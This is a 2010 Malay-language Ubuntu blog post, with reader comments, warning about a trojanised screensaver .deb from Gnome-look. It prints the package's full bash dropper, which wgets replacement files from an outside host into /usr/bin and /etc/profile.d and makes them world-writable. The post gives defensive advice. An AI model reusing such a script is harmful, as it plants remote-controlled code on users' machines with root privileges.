Tuesday, June 15, 2010

Mesti Baca : Adakah linux masih 100% invisible dari virus?


Saya merupakan seorang pengguna ubuntu linux yang sebab awalnya beralih menggunakan ubuntu kerana masalah virus dan antivirus dalam sistem operasi windows. Namun apabila muncul persoalan ini, saya masih boleh menjamin bahawa sepanjang 3~4 tahun menggunakan ubuntu, saya tidak pernah berhadapan dengan apa-apa masalah virus dalam ubuntu. Tetapi disini saya ingin menarik perhatian pembaca tentang satu peristiwa berikut;

Seorang pengguna ubuntu telah melaporkan satu perkara yang mengemparkan dalam forum ubuntu. Conorsulli mengatakan beliau telah muatturun satu fail DEB screensaver dari Gnome-look dan apabila dipasang, ia tidak menambahkan screensaver baru ke dalam list screensaver. Apabila diperiksa code package tersebut, beliau mendapati salah satu failnya mempunyai sesuatu yang mengejutkan kerana ia tertulis satu bash script seperti berikut;

#!/bin/sh
cd /usr/bin/
rm Auto.bash
sleep 1
wget http://05748.t35.com/Bots/Auto.bash
chmod 777 Auto.bash
echo -----------------
cd /etc/profile.d/
rm gnome.sh
sleep 1
wget http://05748.t35.com/Bots/gnome.sh
chmod 777 gnome.sh
echo -----------------
clear
exit


Saya tidak expert dalam bash script tetapi saya boleh beritahu script ini boleh menjadi apa sahaja yang dimahukan oleh penciptanya. Ia mampu mengantikan beberapa fail dalam folder system /usr/bin/ dan diganti dengan fail yang diciptanya. Apa yang bahaya ialah ia memperolehi keistimewaan root kerana pengguna memasukkan password tersebut ketika cuba memasang package DEB itu tadi.

Secara istilahnya, ancaman seperti diatas dipanggil botnet.

Apa yang perlu dilakukan?

1 - Hanya gunakan repository rasmi atau yang diketahui dan disyorkan sahaja.
2 - Elak software .DEB atau .RPM dari sumber-sumber yang tidak diketahui

Perlukah memakai antivirus?

Tak perlu. Dengan 2 langkah pencegahan diatas, ubuntu linux anda adalah selamat. Ini kerana dalam ubuntu tidak ada fungsi  autorun, dan fail apa pun tidak disetkan secara default sebagai executable disamping virus perlu mendapat root password sebelum boleh 'mencederakan' system ubuntu anda.

27 comments:

  1. aku baca dalam majalah linux keluaran uk kata linux sekarang dah ada virus sebab perisian yg dipasang pada linux ada yg menggunakan teknologi cross-platform macam java.boleh gunakan clamAV untuk scan virus dalam linux.

    ReplyDelete
  2. oh macam tu erk..kalau kita install gak..apa risiko kita dapat???virus???

    ReplyDelete
  3. salam,
    terima kasih di atas info berguna dari tuan.

    ReplyDelete
  4. btol2..aku pon slalu je guna software cntre..deb package untuk program yg jarang didengari bhye..

    ReplyDelete
  5. setahu aku, clamAV adalah anti virus untuk scan virus windows dalam linux since dalam linux takde virus.

    ReplyDelete
  6. try
    -rkhunter
    -chkrootkit

    tapi buang masa je..tiap kali scan mmg xjmpe pape..hehe

    ReplyDelete
  7. agak xslamat..baik elakkan..atau check dlu code dia..dats y open source ni selamat..hehe

    ReplyDelete
  8. F-secure ada keluarkan antivirus untuk Linux..

    ReplyDelete
  9. skrip tu delete file Auto.sh & gnome.sh lepas tu ganti dengan fail yg telah modified..
    bijak betul pembuatnya..hehe..

    nasib baik aku jarang download screensaver & benda2 alah yg bukan2..
    tiada sistem yg betul2 selamat, ia bergantung kepada cara ia digunakan..
    :)

    ReplyDelete
  10. Lumbricoides_star87June 15, 2010 at 9:02 PM

    tak pelik r. dah agak dah. hacker pro pon gune linux.. tak lme lg ade la tu antivirus khas utk linux..

    ReplyDelete
  11. kod sumber terbuka, ramai orang yang pantau kod2 tu. so mmg selamat.

    ReplyDelete
  12. aku penah tgk ade org buat trojan horse utk linux..
    gambar kat sini..
    http://yoyoparty.com/upload/d4.jpg

    kalau tgk bash sc atas ni, dia bole wget file..
    & ade kemungkinan file trojan utk linux ni boleh di execute dgn root privilege..
    so akan ade 'orang luar' boleh ctrl secara remote?

    ReplyDelete
  13. jangan pasang cd/dvd rom.. kerana live cd juga mampu menukar passwrd Linux dalam PC. hehehe.

    ReplyDelete
  14. yup kisah ni agak lama tapi elok diperingatkan kembali.
    aku juga pernah kata bahawa linux sebenarnya memang dah cukup bagus sebab ada root pass dan repo tapi kalau user tak paham apa guna dua benda tu memang bahaya.

    install apa2 apps dari mana2 sumber.
    masukkan pass root tanpa kira kenapa dan mengapa perlu.

    lama-lama mesti ada malware juga di linux. macam mana yang berlaku kepada mac osx.

    cuma bezanya mac osx dijangkiti daripada perisian cetak rompak dan linux perisian yang free (cetak rompak pun mungkin berlaku)

    ReplyDelete
  15. kalau macam tu banyak lagi la.. usb pun bahaya gak sebab boleh masukkan livecd dalam tu :p

    ReplyDelete
  16. yup2..sbb 2 aku highlight topik ni kt cni..
    kang derang baru2 ni download software plik2 plak...hehe

    ReplyDelete
  17. yups..betul2..dah boleh boot livecd via usb je..

    ReplyDelete
  18. salam tuan empunya melayubuntu ni, bagus mengingatkan kembali kesah virus di linux.. maaf keluar topik sikit, just bg pandangan saya sebgai student yang melihat senario pemakaian OS di pejabat dan di rumah,sektor kerajaan dan non-gov, kebanyakn mereka still memakai windows XP sebanyak 98% klu linux hanye 2 3 orang shaja.. manakal gov hanye memakai linux sebgai server itu pun pakai tender luar untuk jaga site server, pegawai ICT pun ringan sikit keje nye.secara rialiti, linux nye ketahanan 98% dari virus(banyak men terminal ngn kemalasan penduduk malaysia kita untuk tahu dan gune linux tu ape). tapi takpe asalkan kita bergerak dan terus menyebarkan perkara yang baik demi sumber yang halal dan permasalahan yang mendatang seperti virus,lembap,hang,Blue of screen dan sebagainya bg penguna yang tegar menggunakan windows lagi.. hohohoho yang penting cekalkan hati.. ~bakal peniaga sumber terbuka~

    ReplyDelete
  19. another reason linux is not for computer noob. mostly linux user yang aku kenal knows how to operate computer and beberapa orang yang noob computer have to use linux sebab kat tempat kerja dorg guna linux. thankfully admin dorang wise enough to not giving them root access.

    ReplyDelete
  20. tolong tunjuk sikit........... saye baru nak berjinak jinak dengan benda ne

    ReplyDelete
  21. mungkin ni POC je nak tunjuk betapa senang nak sebar virus kat linux ekekeke
    ni nasib baik di kasi bash file, kalau dia compile pastu cilok file tu kat ceruk mana ntah, rasanya ada org perasan tak?

    ReplyDelete
  22. azwan ali...amboi3...haha (suka trademark tu).

    "betapa senang nk sebar virus kat linux"

    Maaf, kenyataan saudara jauh terpesong. Kenyataan tu spatutnya ditaip begini, "betapa senang nk sebar virus kat windows". Nape? Saya xkn trangkan secara teknikal krn kipas-susah-mati windows xmau fhm. Lagipun, saya suka prinsipal 'talk is cheap, show me the stats'.

    Sehingga 18 Jun 2010, Ubuntu hanya ada 935 security threats berbanding windows trdedah kpd 1694 security threats. Dengan erti kata lain, setiap 100 virus/malware yang wujud, 81 ekor akan menyerang windows manakala hanya 19 menyerang ubuntu. kalu btul la virus sng nk masuk linux, pnah x saudara azwan trbaca artikel,howto,tips,forum atau sebagainya ttg cara2 nk remove virus linux, sy ulang, virus linux.

    Rnung2kan dan slamat beramal...ᴖ_ᴖ

    sumber:
    1) http://secunia.com/advisories/search/?search=ubuntu
    2) http://secunia.com/advisories/search/?search=%22windows%22

    ReplyDelete

Terima kasih atas respon..

Quartz OS: Material Design + Linux = Awesome

Konsep Material Design pertama kali diperkenalkan oleh Google untuk Android 5.0 Lollipop. Nampaknya, ada developer yang berminat untuk ...